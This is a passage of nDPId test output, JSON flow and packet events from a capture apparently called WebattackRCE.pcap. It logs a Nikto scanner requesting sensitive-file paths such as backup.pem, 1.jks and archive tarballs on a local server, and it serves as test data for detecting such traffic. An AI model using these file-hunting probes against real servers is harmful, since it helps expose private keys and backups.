{"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276943,"pkt":"AAAAAAAAAAAAAAAACABFAADCuRhAAEAGgxt\/AAABfwAAAcLoH5DBbYFGICWC9IAYAED+tgAAAQEICp1m+\/edZvv3R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276945,"pkt":"AAAAAAAAAAAAAAAACABFAAC9GW5AAEAGIst\/AAABfwAAAcLqH5C0ISE5HkW76YAYAED+sQAAAQEICp1m+\/mdZvv5R0VUIC8xLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276947,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hilAAEAGtg9\/AAABfwAAAcLsH5DmS75z\/EZQIIAYAED+sQAAAQEICp1m+\/udZvv7R0VUIC8xLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276949,"pkt":"AAAAAAAAAAAAAAAACABFAADG8sFAAEAGSW5\/AAABfwAAAcLuH5DZeMrrTWBmVIAYAED+ugAAAQEICp1m+\/2dZvv9R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276950,"pkt":"AAAAAAAAAAAAAAAACABFAADGIHlAAEAGG7d\/AAABfwAAAcLwH5AJERgjseiOe4AYAED+ugAAAQEICp1m+\/6dZvv+R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276953,"pkt":"AAAAAAAAAAAAAAAACABFAADB609AAEAGUOV\/AAABfwAAAcLyH5CMSNMc4cqoooAYAED+tQAAAQEICp1m\/AGdZvwBR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276955,"pkt":"AAAAAAAAAAAAAAAACABFAADBW5ZAAEAG4J5\/AAABfwAAAcL0H5DrXWPDXa4XUYAYAED+tQAAAQEICp1m\/AOdZvwDR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276956,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/O0xAAEAGAOt\/AAABfwAAAcL2H5D9kwMeqK3jJ4AYAED+swAAAQEICp1m\/ASdZvwER0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276957,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/H8ZAAEAGHHF\/AAABfwAAAcL4H5BlEieUASYiL4AYAED+swAAAQEICp1m\/AWdZvwFR0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276959,"pkt":"AAAAAAAAAAAAAAAACABFAADIMS5AAEAGCwB\/AAABfwAAAcL6H5D33Al8T9gIjoAYAED+vAAAAQEICp1m\/AedZvwHR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276960,"pkt":"AAAAAAAAAAAAAAAACABFAADI29RAAEAGYFl\/AAABfwAAAcL8H5B21OOLlrDXQ4AYAED+vAAAAQEICp1m\/AidZvwIR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 